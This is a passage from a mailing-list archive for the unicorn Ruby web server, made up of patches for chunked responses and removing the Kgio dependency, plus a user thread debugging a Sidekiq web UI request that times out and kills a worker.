  -#define UH_FL_RES_CHUNK_OK (1U << 12)
  +#define UH_FL_RES_CHUNK_VER (1U << 12)
  +#define UH_FL_RES_CHUNK_METHOD (1U << 13)
   
   /* all of these flags need to be set for keepalive to be supported */
   #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
   
  +/* we can only chunk responses for non-HEAD HTTP/1.1 requests */
  +#define UH_FL_RES_CHUNKABLE (UH_FL_RES_CHUNK_VER | UH_FL_RES_CHUNK_METHOD)
  +
   static unsigned int MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
   
   /* this is only intended for use with Rainbows! */
  @@ -146,6 +150,9 @@ request_method(struct http_parser *hp, const char *ptr, size_t len)
   {
     VALUE v = rb_str_new(ptr, len);
   
  +  if (len != 4 || memcmp(ptr, "HEAD", 4))
  +    HP_FL_SET(hp, RES_CHUNK_METHOD);
  +
     rb_hash_aset(hp->env, g_request_method, v);
   }
   
  @@ -159,7 +166,7 @@ http_version(struct http_parser *hp, const char *ptr, size_t len)
     if (CONST_MEM_EQ("HTTP/1.1", ptr, len)) {
       /* HTTP/1.1 implies keepalive unless "Connection: close" is set */
       HP_FL_SET(hp, KAVERSION);
  -    HP_FL_SET(hp, RES_CHUNK_OK);
  +    HP_FL_SET(hp, RES_CHUNK_VER);
       v = g_http_11;
     } else if (CONST_MEM_EQ("HTTP/1.0", ptr, len)) {
       v = g_http_10;
  @@ -806,9 +813,9 @@ static VALUE HttpParser_keepalive(VALUE self)
   /* :nodoc: */
   static VALUE chunkable_response_p(VALUE self)
   {
  -  struct http_parser *hp = data_get(self);
  +  const struct http_parser *hp = data_get(self);
   
  -  return HP_FL_ALL(hp, RES_CHUNK_OK) ? Qtrue : Qfalse;
  +  return HP_FL_ALL(hp, RES_CHUNKABLE) ? Qtrue : Qfalse;
   }
   
   /**
  diff --git a/lib/unicorn.rb b/lib/unicorn.rb
  index 8b1cda7..b817b77 100644
  --- a/lib/unicorn.rb
  +++ b/lib/unicorn.rb
  @@ -66,7 +66,6 @@ def self.builder(ru, op)
   
         middleware = { # order matters
           ContentLength: nil,
  -        Chunked: nil,
           CommonLogger: [ $stderr ],
           ShowExceptions: nil,
           Lint: nil,
  diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
  index 342dd0b..0ed0ae3 100644
  --- a/lib/unicorn/http_response.rb
  +++ b/lib/unicorn/http_response.rb
  @@ -12,6 +12,12 @@ module Unicorn::HttpResponse
   
     STATUS_CODES = defined?(Rack::Utils::HTTP_STATUS_CODES) ?
                    Rack::Utils::HTTP_STATUS_CODES : {}
  +  STATUS_WITH_NO_ENTITY_BODY = defined?(
  +                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY) ?
  +                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY : begin
  +    warn 'Rack::Utils::STATUS_WITH_NO_ENTITY_BODY missing'
  +    {}
  +  end
   
     # internal API, code will always be common-enough-for-even-old-Rack
     def err_response(code, response_start_sent)
  @@ -40,7 +46,7 @@ def http_response_write(socket, status, headers, body,
         code = status.to_i
         msg = STATUS_CODES[code]
         start = req.response_start_sent ? ''.freeze : 'HTTP/1.1 '.freeze
  -      term = false
  +      term = STATUS_WITH_NO_ENTITY_BODY.include?(code) || false
         buf = "#{start}#{msg ? %Q(#{code} #{msg}) : status}\r\n" \
               "Date: #{httpdate}\r\n" \
               "Connection: close\r\n"
  diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
  index 4ae4c85..c2ba75e 100644
  --- a/lib/unicorn/socket_helper.rb
  +++ b/lib/unicorn/socket_helper.rb
  @@ -15,7 +15,7 @@ def kgio_tryaccept # :nodoc:
       end
     end
   
  -  if IO.instance_method(:write).arity # Ruby <= 2.4
  +  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
       require 'unicorn/write_splat'
       UNIXClient = Class.new(Kgio::Socket) # :nodoc:
       class UNIXSrv < Kgio::UNIXServer # :nodoc:
  diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
  index cea9791..fe98fcc 100644
  --- a/test/unit/test_server.rb
  +++ b/test/unit/test_server.rb
  @@ -196,7 +196,7 @@ def test_client_shutdown_writes
       # continue to process our request and never hit EOFError on our sock
       sock.shutdown(Socket::SHUT_WR)
       buf = sock.read
  -    assert_match %r{\bhello!\\n\b}, buf.split(/\r\n\r\n/).last
  +    assert_match %r{\bhello!\\n\b}, buf.split(/\r\n\r\n/, 2).last
       next_client = Net::HTTP.get(URI.parse("http://127.0.0.1:#@port/"))
       assert_equal 'hello!\n', next_client
       lines = File.readlines("test_stderr.#$$.log")

 Documentation/unicorn.1          |  2 +-
 examples/echo.ru                 |  1 -
 ext/unicorn_http/unicorn_http.rl | 18 ++++++++++++++++++
 lib/unicorn.rb                   |  5 ++---
 lib/unicorn/http_response.rb     | 27 ++++++++++++++++++++++++++-
 lib/unicorn/socket_helper.rb     | 18 ++++++++++++++++--
 lib/unicorn/write_splat.rb       |  7 +++++++
 test/unit/test_server.rb         |  2 +-
 8 files changed, 71 insertions(+), 9 deletions(-)
 create mode 100644 lib/unicorn/write_splat.rb

diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
index d76d40f..b2c5e70 100644
--- a/Documentation/unicorn.1
+++ b/Documentation/unicorn.1
@@ -176,7 +176,7 @@ As of Unicorn 0.94.0, RACK_ENV is exported as a process\-wide environment
 variable as well.  While not current a part of the Rack specification as
 of Rack 1.0.1, this has become a de facto standard in the Rack world.
 .PP
-Note the Rack::ContentLength and Rack::Chunked middlewares are also
+Note the Rack::ContentLength middleware is also
 loaded by "deployment" and "development", but no other values of
 RACK_ENV.  If needed, they must be individually specified in the
 RACKUP_FILE, some frameworks do not require them.
diff --git a/examples/echo.ru b/examples/echo.ru
index 14908c5..e982180 100644
--- a/examples/echo.ru
+++ b/examples/echo.ru
@@ -19,7 +19,6 @@ def each(&block)
 
 end
 
-use Rack::Chunked
 run lambda { |env|
   /\A100-continue\z/i =~ env['HTTP_EXPECT'] and return [100, {}, []]
   [ 200, { 'Content-Type' => 'application/octet-stream' },
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index ba23438..afdf680 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -28,10 +28,15 @@ void init_unicorn_httpdate(void);
 #define UH_FL_TO_CLEAR 0x200
 #define UH_FL_RESSTART 0x400 /* for check_client_connection */
 #define UH_FL_HIJACK 0x800
+#define UH_FL_RES_CHUNK_VER (1U << 12)
+#define UH_FL_RES_CHUNK_METHOD (1U << 13)
 
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
 
+/* we can only chunk responses for non-HEAD HTTP/1.1 requests */
+#define UH_FL_RES_CHUNKABLE (UH_FL_RES_CHUNK_VER | UH_FL_RES_CHUNK_METHOD)
+
 static unsigned int MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
 
 /* this is only intended for use with Rainbows! */
@@ -145,6 +150,9 @@ request_method(struct http_parser *hp, const char *ptr, size_t len)
 {
   VALUE v = rb_str_new(ptr, len);
 
+  if (len != 4 || memcmp(ptr, "HEAD", 4))
+    HP_FL_SET(hp, RES_CHUNK_METHOD);
+
   rb_hash_aset(hp->env, g_request_method, v);
 }
 
@@ -158,6 +166,7 @@ http_version(struct http_parser *hp, const char *ptr, size_t len)
   if (CONST_MEM_EQ("HTTP/1.1", ptr, len)) {
     /* HTTP/1.1 implies keepalive unless "Connection: close" is set */
     HP_FL_SET(hp, KAVERSION);
+    HP_FL_SET(hp, RES_CHUNK_VER);
     v = g_http_11;
   } else if (CONST_MEM_EQ("HTTP/1.0", ptr, len)) {
     v = g_http_10;
@@ -801,6 +810,14 @@ static VALUE HttpParser_keepalive(VALUE self)
   return HP_FL_ALL(hp, KEEPALIVE) ? Qtrue : Qfalse;
 }
 
+/* :nodoc: */
+static VALUE chunkable_response_p(VALUE self)
+{
+  const struct http_parser *hp = data_get(self);
+
+  return HP_FL_ALL(hp, RES_CHUNKABLE) ? Qtrue : Qfalse;
+}
+
 /**
  * call-seq:
  *    parser.next? => true or false
@@ -981,6 +998,7 @@ void Init_unicorn_http(void)
   rb_define_method(cHttpParser, "content_length", HttpParser_content_length, 0);
   rb_define_method(cHttpParser, "body_eof?", HttpParser_body_eof, 0);
   rb_define_method(cHttpParser, "keepalive?", HttpParser_keepalive, 0);
+  rb_define_method(cHttpParser, "chunkable_response?", chunkable_response_p, 0);
   rb_define_method(cHttpParser, "headers?", HttpParser_has_headers, 0);
   rb_define_method(cHttpParser, "next?", HttpParser_next, 0);
   rb_define_method(cHttpParser, "buf", HttpParser_buf, 0);
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..b817b77 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -66,7 +66,6 @@ def self.builder(ru, op)
 
       middleware = { # order matters
         ContentLength: nil,
-        Chunked: nil,
         CommonLogger: [ $stderr ],
         ShowExceptions: nil,
         Lint: nil,
@@ -75,8 +74,8 @@ def self.builder(ru, op)
 
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
-      # and Zbatery both do.  Users accustomed to the Rack::Server default
-      # middlewares will need ContentLength/Chunked middlewares.
+      # does.  Users accustomed to the Rack::Server default
+      # middlewares will need ContentLength middleware.
       case ENV["RACK_ENV"]
       when "development"
       when "deployment"
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 19469b4..0ed0ae3 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -12,6 +12,12 @@ module Unicorn::HttpResponse
 
   STATUS_CODES = defined?(Rack::Utils::HTTP_STATUS_CODES) ?
                  Rack::Utils::HTTP_STATUS_CODES : {}
+  STATUS_WITH_NO_ENTITY_BODY = defined?(
+                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY) ?
+                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY : begin
+    warn 'Rack::Utils::STATUS_WITH_NO_ENTITY_BODY missing'
+    {}
+  end
 
   # internal API, code will always be common-enough-for-even-old-Rack
   def err_response(code, response_start_sent)
@@ -35,11 +41,12 @@ def append_header(buf, key, value)
   def http_response_write(socket, status, headers, body,
                           req = Unicorn::HttpRequest.new)
     hijack = nil
-
+    do_chunk = false
     if headers
       code = status.to_i
       msg = STATUS_CODES[code]
       start = req.response_start_sent ? ''.freeze : 'HTTP/1.1 '.freeze
+      term = STATUS_WITH_NO_ENTITY_BODY.include?(code) || false
       buf = "#{start}#{msg ? %Q(#{code} #{msg}) : status}\r\n" \
             "Date: #{httpdate}\r\n" \
             "Connection: close\r\n"
@@ -47,6 +54,12 @@ def http_response_write(socket, status, headers, body,
         case key
         when %r{\A(?:Date|Connection)\z}i
           next
+        when %r{\AContent-Length\z}i
+          append_header(buf, key, value)
+          term = true
+        when %r{\ATransfer-Encoding\z}i
+          append_header(buf, key, value)
+          term = true if /\bchunked\b/i === value # value may be Array :x
         when "rack.hijack"
           # This should only be hit under Rack >= 1.5, as this was an illegal
           # key in Rack < 1.5
@@ -55,12 +68,24 @@ def http_response_write(socket, status, headers, body,
           append_header(buf, key, value)
         end
       end
+      if !hijack && !term && req.chunkable_response?
+        do_chunk = true
+        buf << "Transfer-Encoding: chunked\r\n".freeze
+      end
       socket.write(buf << "\r\n".freeze)
     end
 
     if hijack
       req.hijacked!
       hijack.call(socket)
+    elsif do_chunk
+      begin
+        body.each do |b|
+          socket.write("#{b.bytesize.to_s(16)}\r\n", b, "\r\n".freeze)
+        end
+      ensure
+        socket.write("0\r\n\r\n".freeze)
+      end
     else
       body.each { |chunk| socket.write(chunk) }
     end
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 8a6f6ee..c2ba75e 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -15,6 +15,20 @@ def kgio_tryaccept # :nodoc:
     end
   end
 
+  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
+    require 'unicorn/write_splat'
+    UNIXClient = Class.new(Kgio::Socket) # :nodoc:
+    class UNIXSrv < Kgio::UNIXServer # :nodoc:
+      include Unicorn::WriteSplat
+      def kgio_tryaccept # :nodoc:
+        super(UNIXClient)
+      end
+    end
+    TCPClient.__send__(:include, Unicorn::WriteSplat)
+  else # Ruby 2.5+
+    UNIXSrv = Kgio::UNIXServer
+  end
+
   module SocketHelper
 
     # internal interface
@@ -135,7 +149,7 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          Kgio::UNIXServer.new(address)
+          UNIXSrv.new(address)
         ensure
           File.umask(old_umask)
         end
@@ -203,7 +217,7 @@ def server_cast(sock)
         Socket.unpack_sockaddr_in(sock.getsockname)
         TCPSrv.for_fd(sock.fileno)
       rescue ArgumentError
-        Kgio::UNIXServer.for_fd(sock.fileno)
+        UNIXSrv.for_fd(sock.fileno)
       end
     end
 
diff --git a/lib/unicorn/write_splat.rb b/lib/unicorn/write_splat.rb
new file mode 100644
index 0000000..7e6e363
--- /dev/null
+++ b/lib/unicorn/write_splat.rb
@@ -0,0 +1,7 @@
+# -*- encoding: binary -*-
+# compatibility module for Ruby <= 2.4, remove when we go Ruby 2.5+
+module Unicorn::WriteSplat # :nodoc:
+  def write(*arg) # :nodoc:
+    super(arg.join(''))
+  end
+end
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 98e85ab..fe98fcc 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -196,7 +196,7 @@ def test_client_shutdown_writes
     # continue to process our request and never hit EOFError on our sock
     sock.shutdown(Socket::SHUT_WR)
     buf = sock.read
-    assert_equal 'hello!\n', buf.split(/\r\n\r\n/).last
+    assert_match %r{\bhello!\\n\b}, buf.split(/\r\n\r\n/, 2).last
     next_client = Net::HTTP.get(URI.parse("http://127.0.0.1:#@port/"))
     assert_equal 'hello!\n', next_client
     lines = File.readlines("test_stderr.#$$.log")



^ permalink raw reply related	[relevance 3%]

* Re: unicorn worker being killed issue
  @ 2023-05-10 21:34  2%   ` subashkc1
  0 siblings, 0 replies; 200+ results
From: subashkc1 @ 2023-05-10 21:34 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Hi Eric,

Thanks for you reply, I'll try to answer all questions below



> subashkc1 subashkc1@protonmail.com wrote:
>
> > I have a weird issue that I'm having trouble debugging. I've
> > created a sample bare bones rails app where there issue is
> > reproducible https://github.com/subashkc/sidekiq_webui_issue.
>
>
> That's too big and having https://enterprise.contribsys.com/ as
> a source in your Gemfile means I'm probably not able/allowed
> to inspect those gems.
>

I've removed the sidekiq pro form gemfile, it also happens with just the sidekiq gem

> Some general questions:
>
> * how are you starting unicorn and what is the config file?
> (mainly, is `preload_app' enabled? and any hooks?)` preload_app true' is the most common source of problems if
> the rest of your application (including all dependencies)
> isn't equipped to handle fork.

unicorn is started just with `bundle exec unicorn` from a Procfile using foreman, no other config options so its just 1 unicorn worker and its a very bare-bones rails app to reproduce the issue, all I did was add sidekiq gem, and load up the sidekiq webui to see the issue in action
>
> * What are the RACK_ENV / RAILS_ENV?
>

It is happening locally, so all env are development

> `unicorn_rails' is actually pointless nowadays, and the plain` unicorn' command is highly recommended.

I'm only using the unicorn gem, not touching unicorn_rails at all

>
> Use a single worker for debugging, especially if you want to
> strace/truss the process.

Yeah just using 1 unicorn worker with all the default configs, (this repo doesn't have a unicorn config file so all defaults)

>
> Fwiw, I haven't touched Rails roughly a decade (and barely at
> that). My only web apps for the past 15 years or so are on bare
> Rack and meant to be consumed via curl or w3m (nothing involving
> JavaScript or fancy browsers).
>
> Maybe others watching this mailbox can chime in....
>
> > After running the rails app, and load up the sidekiq web UI,
> > if I click on any tabs e.g. busy/queues then the request is
> > served right away with a 200 but it seems there is a 2nd
> > request (can't tell where from) which eventually times out and
> > kills the unicorn worker.
>
>
> I suspect a 2nd request comes from some JS code. Check for a
> network debugging tool included with your browser if it has one.
>

Yeah that's what I can't figure out, I can't see any other requests in the browser network tools

> Or use a single unicorn worker, then strace/truss that worker.
> Something like `strace -p $PID_OF_WORKER -f -v -s5000 -o /tmp/dump`
> (assuming Linux)

I did this, but the output was so verbose I couldn't make any sense of it as I wasn't sure what to look for

>
> Are you able to reproduce the issue with JS disabled?
> Preferably just via curl to minimize surprises.

Ok, it doesn't happen if I do the same request using curl, just doing `curl localhost:8080/sidekiq/busy` and if I do this right after clicking on the tab in the UI, this request doesn't get served right away, it waits until the request from the UI times out >60s, kills the unicorn worker and then the curl req is served

>
> > I originally opened the issue with sidekiq repo but Mike
> > (sidekiq owner) wasn't able to find anything wrong with
> > sidekiq code and he suggested it seemed unicorn was double
> > reading the request and the 2nd one dies after 60s timeout.
>
>
> Double-reading a request is impossible unless there's something
> very broken in Ruby or your networking stack. There'd be a
> hundreds of reports about it if that were true if Ruby or
> unicorn were double-reading requests.
>
> Are you going through some firewalls, or caching/scanning
> proxies which might send a request twice? I've seen that before.
>

No, this is all happening locally on my dev machine, no firewalls or proxies involved

> I have seen some folks accidentally enable multiple loggers,
> so it looks like a single request is happening multiple times.
>

No, just a very basic rails app with the default logger, haven't enabled or added anything else

> strace is usually my tool for debugging stuff like this; along
> with sprinkling `warn "#{LINE} ..."' statements throughout.
> And then perhaps commenting out lots of code and disabling
> as many dependencies as possible.

Yeah it is a rails app with just the sidekiq gem, no other dependencies and no code to disable, haven't added anything.

Let me know if that gives you some hints or if there are other things that I can try or check

Warm Regards

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-08  6:22  2%           ` Jean Boussier
@ 2022-09-21 22:16  0%             ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-09-21 22:16 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Oh, that's what I missed, that makes sense. I'll try the C wrapper
> to send both the message and the IO at the same time.
> 
> Thanks again, I'll likely get back to you next week with a patch.

Btw, did you ever get anywhere with this?  I'll have to cut a
release at some point soonish since rack 3.0 was released
earlier this month and there's incompatibilities :<

^ permalink raw reply	[relevance 0%]

* [PATCH] Get rid of Kgio
@ 2022-07-08 13:17  2% Jean Boussier
  0 siblings, 0 replies; 200+ results
From: Jean Boussier @ 2022-07-08 13:17 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 17184 bytes --]

As discussed kgio is no longer absolutely necessary.

We can use Ruby 2+ non blocking IO capabilities instead.

Also available at https://github.com/casperisfine/unicorn.git (remove-kgio)

---
  lib/unicorn.rb                 |  3 +--
  lib/unicorn/http_request.rb    | 15 +++++++++-----
  lib/unicorn/http_server.rb     | 33 +++++++++++++++++++++--------
  lib/unicorn/socket_helper.rb   | 20 ++++--------------
  lib/unicorn/stream_input.rb    | 16 ++++++++------
  lib/unicorn/worker.rb          | 38 ++++++++++++++++++++++------------
  t/oob_gc.ru                    |  2 +-
  t/oob_gc_path.ru               |  2 +-
  test/unit/test_request.rb      | 16 +++-----------
  test/unit/test_stream_input.rb |  7 ++-----
  test/unit/test_tee_input.rb    |  2 +-
  unicorn.gemspec                |  1 -
  12 files changed, 82 insertions(+), 73 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..170719c 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
  # -*- encoding: binary -*-
  require 'etc'
  require 'stringio'
-require 'kgio'
  require 'raindrops'
  require 'io/wait'

@@ -113,7 +112,7 @@ def self.log_error(logger, prefix, exc)
    F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/

    def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
        # shrink pipes to minimize impact on 
/proc/sys/fs/pipe-user-pages-soft
        # limits.
        if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..7f7324b 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -71,14 +71,19 @@ def read(socket)
      #  identify the client for the immediate request to the server;
      #  that client may be a proxy, gateway, or other intermediary
      #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    address = socket.remote_address
+    e['REMOTE_ADDR'] = if address.unix?
+      "127.0.0.1"
+    else
+      address.ip_address
+    end

      # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
      if parse.nil?
        # Parser is not done, queue up more data to read and continue 
parsing
        # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
      end

      check_client_connection(socket) if @@check_client_connection
@@ -108,7 +113,7 @@ def hijacked?
      TCPI = Raindrops::TCP_Info.allocate

      def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+      if TCPSocket === socket
          # Raindrops::TCP_Info#get!, #state (reads struct 
tcp_info#tcpi_state)
          raise Errno::EPIPE, "client closed connection".freeze,
                EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -153,7 +158,7 @@ def closed_state?(state) # :nodoc:
      # Not that efficient, but probably still better than doing unnecessary
      # work after a client gives up.
      def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+      if TCPSocket === socket && @@tcpi_inspect_ok
          opt = socket.getsockopt(Socket::IPPROTO_TCP, 
Socket::TCP_INFO).inspect
          if opt =~ /\bstate=(\S+)/
            raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..98cd119 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,7 +111,7 @@ def initialize(app, options = {})
      @worker_data = if worker_data = ENV['UNICORN_WORKER']
        worker_data = worker_data.split(',').map!(&:to_i)
        worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
+        IO.for_fd(i)
        end
        worker_data
      end
@@ -240,7 +240,7 @@ def listen(address, opt = 
{}.merge(listener_opts[address] || {}))
      tries = opt[:tries] || 5
      begin
        io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
+      unless TCPServer === io || UNIXServer === io
          io.autoclose = false
          io = server_cast(io)
        end
@@ -386,12 +386,18 @@ def master_sleep(sec)
      # the Ruby itself and not require a separate malloc (on 32-bit MRI 
1.9+).
      # Most reads are only one byte here and uncommon, so it's not worth a
      # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    begin
+      @self_pipe[0].read_nonblock(11)
+    rescue Errno::EAGAIN
+    end
    end

    def awaken_master
      return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    begin
+      @self_pipe[1].write_nonblock('.') # wakeup master process from select
+    rescue Errno::EAGAIN
+    end
    end

    # reaps all unreaped workers
@@ -581,7 +587,10 @@ def handle_error(client, e)
        500
      end
      if code
-      client.kgio_trywrite(err_response(code, 
@request.response_start_sent))
+      begin
+        client.write_nonblock(err_response(code, 
@request.response_start_sent))
+      rescue Errno::EAGAIN
+      end
      end
      client.close
    rescue
@@ -733,9 +742,15 @@ def worker_loop(worker)
        reopen = reopen_worker_logs(worker.nr) if reopen
        worker.tick = time_now.to_i
        while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
+        # Unicorn::Worker#accept_nonblock is not like accept(2) at all,
          # but that will return false
-        if client = sock.kgio_tryaccept
+        client = begin
+          sock.accept_nonblock
+        rescue Errno::EAGAIN
+          false
+        end
+
+        if client
            process_client(client)
            worker.tick = time_now.to_i
          end
@@ -834,7 +849,7 @@ def redirect_io(io, path)

    def inherit_listeners!
      # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
+    # before they become UNIXServer or TCPServer
      inherited = ENV['UNICORN_FD'].to_s.split(',')

      # emulate sd_listen_fds() for systemd
@@ -858,7 +873,7 @@ def inherit_listeners!
      LISTENERS.replace(inherited)

      # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
+    # TCPServer or UNIXServer objects; but since the Socket
      # objects share the same OS-level file descriptor as the higher-level
      # *Server objects; we need to prevent Socket objects from being
      # garbage-collected
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 8a6f6ee..9d2ba52 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,18 +3,6 @@
  require 'socket'

  module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
    module SocketHelper

      # internal interface
@@ -135,7 +123,7 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
          end
          old_umask = File.umask(opt[:umask] || 0)
          begin
-          Kgio::UNIXServer.new(address)
+          UNIXServer.new(address)
          ensure
            File.umask(old_umask)
          end
@@ -164,7 +152,7 @@ def new_tcp_server(addr, port, opt)
        end
        sock.bind(Socket.pack_sockaddr_in(port, addr))
        sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      TCPServer.for_fd(sock.fileno)
      end

      # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -201,9 +189,9 @@ def sock_name(sock)
      def server_cast(sock)
        begin
          Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
+        TCPServer.for_fd(sock.fileno)
        rescue ArgumentError
-        Kgio::UNIXServer.for_fd(sock.fileno)
+        UNIXServer.for_fd(sock.fileno)
        end
      end

diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..3241ff4 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,3 +1,4 @@
+
  # -*- encoding: binary -*-

  # When processing uploads, unicorn may expose a StreamInput object under
@@ -49,7 +50,11 @@ def read(length = nil, rv = '')
          to_read = length - @rbuf.size
          rv.replace(@rbuf.slice!(0, @rbuf.size))
          until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
+          begin
+            @socket.readpartial(to_read, @buf)
+          rescue EOFError
+            eof!
+          end
            filter_body(@rbuf, @buf)
            rv << @rbuf
            to_read -= @rbuf.size
@@ -72,8 +77,7 @@ def read(length = nil, rv = '')
    # Returns nil if called at the end of file.
    # This takes zero arguments for strict Rack::Lint compatibility,
    # unlike IO#gets.
-  def gets
-    sep = $/
+  def gets(sep = $/)
      if sep.nil?
        read_all(rv = '')
        return rv.empty? ? nil : rv
@@ -83,7 +87,7 @@ def gets
      begin
        @rbuf.sub!(re, '') and return $1
        return @rbuf.empty? ? nil : @rbuf.slice!(0, @rbuf.size) if eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
        filter_body(once = '', @buf)
        @rbuf << once
      end while true
@@ -107,7 +111,7 @@ def each
    def eof?
      if @parser.body_eof?
        while @chunked && ! @parser.parse
-        once = @socket.kgio_read(@@io_chunk_size) or eof!
+        once = @socket.readpartial(@@io_chunk_size) or eof!
          @buf << once
        end
        @socket = nil
@@ -127,7 +131,7 @@ def read_all(dst)
      dst.replace(@rbuf)
      @socket or return
      until eof?
-      @socket.kgio_read(@@io_chunk_size, @buf) or eof!
+      @socket.readpartial(@@io_chunk_size, @buf) or eof!
        filter_body(@rbuf, @buf)
        dst << @rbuf
      end
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 5ddf379..fe741c0 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -63,27 +63,39 @@ def soft_kill(sig) # :nodoc:
        signum = Signal.list[sig.to_s] or
            raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
      end
+
      # writing and reading 4 bytes on a pipe is atomic on all POSIX 
platforms
      # Do not care in the odd case the buffer is full, here.
-    @master.kgio_trywrite([signum].pack('l'))
+    begin
+      @master.write_nonblock([signum].pack('l'))
+    rescue Errno::EAGAIN
+    end
    rescue Errno::EPIPE
      # worker will be reaped soon
    end

    # this only runs when the Rack app.call is not running
    # act like a listener
-  def kgio_tryaccept # :nodoc:
-    case buf = @to_io.kgio_tryread(4)
-    when String
-      # unpack the buffer and trigger the signal handler
-      signum = buf.unpack('l')
-      fake_sig(signum[0])
-      # keep looping, more signals may be queued
-    when nil # EOF: master died, but we are at a safe place to exit
-      fake_sig(:QUIT)
-    when :wait_readable # keep waiting
-      return false
-    end while true # loop, as multiple signals may be sent
+  def accept_nonblock # :nodoc:
+    loop do
+      buf = begin
+        @to_io.read_nonblock(4)
+      rescue Errno::EAGAIN # keep waiting
+        return false
+      rescue EOFError # master died, but we are at a safe place to exit
+        fake_sig(:QUIT)
+      end
+
+      case buf
+      when String
+        # unpack the buffer and trigger the signal handler
+        signum = buf.unpack('l')
+        fake_sig(signum[0])
